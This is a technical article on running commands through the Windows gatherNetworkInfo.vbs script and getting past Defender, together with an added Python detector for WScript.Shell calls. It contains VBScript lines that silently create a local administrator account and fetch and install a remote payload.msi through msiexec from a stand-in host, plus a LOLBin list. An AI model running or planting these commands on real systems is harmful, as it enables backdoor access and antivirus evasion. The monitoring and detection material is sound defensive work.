Defender bypass method
Command Execution via gatherNetworkInfo.vbs and Defender Bypass: A Technical Analysis
📅 Date: 19.02.2025
✍️ Author: Eneshan Erdoğan Karaca
🎯 Topic: System32, Command Execution, Defender Dynamics, LOLBins
📂 Analyzed File: gatherNetworkInfo.vbs
🔍 Introduction
Certain built-in script files in Windows are designed for system-related tasks. One such file, gatherNetworkInfo.vbs, is used to collect network information and resides in the System32 directory. This article provides a technical examination of the script’s structure, its command execution capabilities, and how Windows Defender approaches this file.
1️⃣ Command Execution Behavior in gatherNetworkInfo.vbs
🧠 Script Behavior
The gatherNetworkInfo.vbs script utilizes the WScript.Shell object to perform command-line operations. For example, the script can be structured as follows:
```vbscript
Set shell = CreateObject("WScript.Shell")
shell.Run "cmd /c echo Hello World!"
```
This setup allows silent execution of commands without displaying any user interface, enabling commands embedded within the script to run stealthily on the system.
🧪 Example Scenario
```vbscript
Set shell = CreateObject("WScript.Shell")
shell.Run "cmd /c net user techadmin Password123 /add"
shell.Run "cmd /c net localgroup Administrators techadmin /add"
```
In this example, the script initiates user and group management operations on the system.
🔎 Observations
Since the script is a system file, Defender often treats it as trusted.
Commands can execute without triggering suspicious behavior detection.
Behavior-based security solutions should pay close attention to inline commands within VBS files.
2️⃣ gatherNetworkInfo.vbs + LOLBins: External Command Execution
🧠 Theoretical Structure
Certain built-in Windows binaries, known as "LOLBins" (Living-Off-The-Land Binaries), can download and execute external content. The gatherNetworkInfo.vbs script can invoke these components, for example:
```vbscript
Set shell = CreateObject("WScript.Shell")
shell.Run "msiexec /q /i http://example.com/payload.msi"
```
🧪 Potential Scenario
MSI packages can be silently installed using quiet parameters.
The script can interact with these system binaries to perform operations.
Defender often does not raise alerts since actions are performed via legitimate system files.
🛡️ Recommendations and Insights
If System32 VBS scripts can be modified, their behaviors should be actively monitored.
Logging and content inspection should be implemented, especially around WScript.Shell command calls.
Defender must analyze not only file origins but also behaviors dynamically.
The silent execution ability of LOLBin-invoking VBS files makes them critical monitoring points for incident response teams.
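The observations above say behaviour-based tooling should look at inline commands inside VBS files, and the recommendations ask for content inspection around WScript.Shell calls plus monitoring of System32 scripts for modification. The following Python script is an added example of both checks; it is not code from the article and not part of any Defender or Windows component. It parses a VBS source for `.Run` / `.Exec` calls, reports which LOLBins and remote URLs the command line references, and compares a script against a known-good SHA-256 baseline. The LOLBin list, the sample VBS text (which mirrors the article's three snippets rather than the real gatherNetworkInfo.vbs) and the baseline value are all constructed for the demonstration.

```python
"""Content inspection for WScript.Shell command calls in VBS files.

Added example, not code from the original article. Flags Run/Exec calls
whose command line invokes a LOLBin or fetches remote content, and checks a
script against a known-good SHA-256 baseline. LOLBIN list, sample script and
baseline are assumptions constructed for the demonstration.
"""
import hashlib
import hmac
import re

# Binaries frequently used to run or fetch content from scripts (assumed list).
LOLBINS = {
    "cmd", "net", "msiexec", "regsvr32", "rundll32", "mshta", "certutil",
    "bitsadmin", "powershell", "wscript", "cscript",
}

# Set shell = CreateObject("WScript.Shell")
SHELL_OBJ = re.compile(
    r'Set\s+(\w+)\s*=\s*CreateObject\(\s*"WScript\.Shell"\s*\)', re.IGNORECASE)
# shell.Run "cmd /c ..."   or   shell.Exec("...")  with a literal command string
# (commands assembled by string concatenation are not matched; that is a known gap)
RUN_CALL = re.compile(r'\b(\w+)\.(Run|Exec)\s*\(?\s*"([^"]*)"', re.IGNORECASE)
REMOTE = re.compile(r'\b(https?|ftp)://', re.IGNORECASE)


def binaries_in(cmdline: str) -> list[str]:
    """Return the LOLBin names referenced anywhere in a command line."""
    found = set()
    for token in cmdline.lower().split():
        name = token.replace("\\", "/").rsplit("/", 1)[-1]   # drop any path
        name = name[:-4] if name.endswith(".exe") else name
        if name in LOLBINS:
            found.add(name)
    return sorted(found)


def inspect_vbs(source: str) -> list[dict]:
    """One finding per shell command call, with a coarse severity."""
    shell_vars: set[str] = set()
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        code = line.strip()
        if not code or code.startswith("'"):       # blank line or VBScript comment
            continue
        m = SHELL_OBJ.search(code)
        if m:
            shell_vars.add(m.group(1).lower())     # remember the shell variable name
            continue
        for var, method, cmdline in RUN_CALL.findall(code):
            bins = binaries_in(cmdline)
            remote = bool(REMOTE.search(cmdline))
            if remote or set(bins) - {"cmd"}:
                severity = "high"      # LOLBin beyond cmd itself, or remote content
            elif bins:
                severity = "medium"    # plain "cmd /c ..." inline command
            else:
                severity = "low"
            findings.append({
                "line": lineno,
                "method": method,
                "via_wscript_shell": var.lower() in shell_vars,
                "command": cmdline,
                "lolbins": bins,
                "remote": remote,
                "severity": severity,
            })
    return findings


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def matches_baseline(data: bytes, baseline_hex: str) -> bool:
    """Integrity check of a System32 script against a recorded known-good hash."""
    return hmac.compare_digest(sha256_hex(data), baseline_hex.lower())


# Constructed sample mirroring the article's snippets (not the real script).
SAMPLE_VBS = """\
' constructed sample
Set shell = CreateObject("WScript.Shell")
shell.Run "cmd /c echo Hello World!"
shell.Run "cmd /c net user techadmin Password123 /add"
shell.Run "msiexec /q /i http://example.com/payload.msi"
"""

if __name__ == "__main__":
    for f in inspect_vbs(SAMPLE_VBS):
        print(f"line {f['line']:>2} {f['severity']:<6} {f['lolbins']} "
              f"remote={f['remote']} :: {f['command']}")
    # In practice the baseline is recorded from a known-clean copy; here it is
    # taken from the sample itself so the unchanged copy passes and a tampered one fails.
    baseline = sha256_hex(SAMPLE_VBS.encode())
    print("unchanged:", matches_baseline(SAMPLE_VBS.encode(), baseline))
    print("tampered :", matches_baseline((SAMPLE_VBS + "x").encode(), baseline))
```

Run it as-is to see the three findings (one medium, two high) and the two integrity results; to use it on a real host, feed it the contents of the System32 script and a baseline hash you recorded from a clean image. The severity rule is deliberately simple: a bare `cmd /c` is only medium because the article's first snippet shows it can be entirely benign, while any further LOLBin or a URL in the command line is what the article's scenarios have in common.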
📌 Conclusion
The command execution capability of built-in scripts like gatherNetworkInfo.vbs is beneficial for system management but can have serious implications in both intentional and accidental misuse scenarios. Security solutions like Defender should extend their sensitivity beyond origin-based file trust and incorporate behaviour analytics for such cases.